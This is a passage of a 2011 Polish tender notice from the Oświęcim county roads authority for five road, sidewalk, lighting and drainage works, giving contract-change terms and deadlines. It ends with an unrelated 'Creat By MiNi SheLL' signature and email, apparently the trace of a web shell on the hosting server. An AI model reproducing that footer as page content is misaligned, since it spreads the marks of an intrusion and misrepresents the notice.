<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień umowy może być dokonana tylko w przypadku:
a.	siły wyższej, to jest m.in. klęski żywiołowe (jak huragany, powodzie, trzęsienie ziemi),
b.	wystąpienia nadzwyczajnych  warunków pogodowych nie pozwalających na realizację robót zgodnie z warunkami określonymi w SST np. długotrwałe i intensywne opady deszczu, długotrwałe wysokie temperatury, itp., co powoduje zmianę terminu zamówienia,
c.	ujawnienia niezinwentaryzowanych urządzeń obcych i koniecznością  wykonania robót  dodatkowych  związanych  z  ich  zabezpieczeniem  lub przełożeniem, co wiąże się z przedłużeniem terminu wykonania zamówienia,
d.	gdy zmianie ulegną powszechnie obowiązujące  przepisy prawne istotne dla realizacji przedmiotu umowy,
e.	w razie wystąpienia urzędowej zmiany  stawki podatku VAT,
f.	dokonano zmian w dokumentacji projektowej na wniosek Zamawiającego lub Wykonawcy,
g.	 z uwagi na niezależne od stron umowy nastąpiły zmiany organizacyjne  osób kluczowych dla realizacji umowy np. kierownika budowy, inspektora nadzoru inwestorskiego, osób reprezentujących strony ( w szczególności  choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne).
h.	niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy Wykonawcy i jego podwykonawców,
i.	inne wydarzenia losowe.
     2. Zmiana postanowień umowy z uwagi na wystąpienie powyższych  okoliczności  może nastąpić pod warunkiem wyrażenia zgody przez Zamawiającego. Termin może ulec przedłużeniu o czas trwania tych okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat.oswiecim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim, - pok. Nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2011 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Oświęcimiu, ul. St. Leszczyńskiej 12, 32-600 Oświęcim, - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku - Zadanie Nr 1 - Budowa chodnika przy ul. Głównej w Osieku (DP 1758K) od DW 949.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dla realizacji w/w zadania, gdzie zakres robót na odcinku o długości 500 m  od skrzyżowania z DW 949 obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - budowę chodnika i kanalizacji deszczowej,
 - budowę peronu przystankowego,
 - wykonanie poszerzenia nawierzchni,
 - montaż systemu oświetlenia aktywnego przejścia dla pieszych,
- roboty wykończeniowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku - Zadanie nr 2 - Przebudowa  skrzyżowania dróg powiatowych Nr 1758K z 1859K  w Osieku w zakresie zmiany organizacji ruchu wraz z remontem ul. Karolina (DP1859K).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dla realizacji w/w zadania, gdzie zakres  dla: 
a)	skrzyżowania dróg - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
- zabezpieczenie/ przebudowę infrastruktury obcej,
 - budowę chodnika,
 - budowę skrzyżowania typu rondo,
 - przebudowa oświetlenia ulicznego,
 - przebudowa kanalizacji deszczowej,
 - wykonanie nowej nawierzchni asfaltobetonowej,
 - roboty wykończeniowe.
b)	Ul. Karolina - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
- budowę chodnika na odcinku 570 mb,
- przebudowa kanalizacji deszczowej,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 3240 m2,
 - roboty wykończeniowe, humusowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku - Zadanie nr 3 - Budowa chodnika przy ul. Kościelnej w Malcu (DP 1859K) wraz z przebudową oświetlenia na skrzyżowaniu dróg powiatowych  Nr 1859K  z 1862K.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dla realizacji w/w zadania, gdzie zakres dla: 
a)	- Skrzyżowania dróg - obejmuje m.in.:
 - roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - przebudowa oświetlenia ulicznego,
 - roboty wykończeniowe.
b)	Ul. Kościelnej w Malcu - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - budowę chodnika na odcinku ok. 650mb,
 - budowa kanalizacji deszczowej na odcinku ok. 530mb,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 3942 m2  wraz z     poszerzeniem jezdni,
 - roboty wykończeniowe, humusowanie.
c)	Zatoki autobusowej - obejmuje m.in.:
- roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - budowę zatoki autobusowej,
 - budowę przejścia dla pieszych,  
 - roboty wykończeniowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku - Zadanie nr 4 - Remont drogi powiatowej Nr  1859K  w  km od   4+530 do  6+010.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> :  Przedmiotem zamówienia są roboty budowlane dla realizacji w/w zadania, gdzie zakres robót obejmuje m.in.:
 - roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - poprawa stanu nawierzchni chodnika na powierzchni ok. 450 m2,
 - przebranie rowów na odcinku 2200 mb,
 - naprawa poboczy gruntowych,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 8600 m2 ,
  - roboty wykończeniowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Modernizacja ciągu komunikacyjnego dróg powiatowych od DW 948 w Nowej Wsi do  DW 949 w Osieku - Zadanie nr 5 - Remont ul. M.M. Kolbego w Nowej Wsi  (DP 1859K) wraz z przebudową oświetlenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane dla realizacji w/w zadania, gdzie zakres robót obejmuje m.in.:
 - roboty przygotowawcze, 
 - roboty rozbiórkowe,
 - frezowanie nawierzchni na powierzchni 1360m2,
 - poprawa stanu technicznego chodników,
 - przebudowa oświetlenia ulicznego,
 - wykonanie nowej nawierzchni asfaltobetonowej na powierzchni 1360m2,
 - roboty wykończeniowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.10.00-8, 45.11.20.00-5, 45.23.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com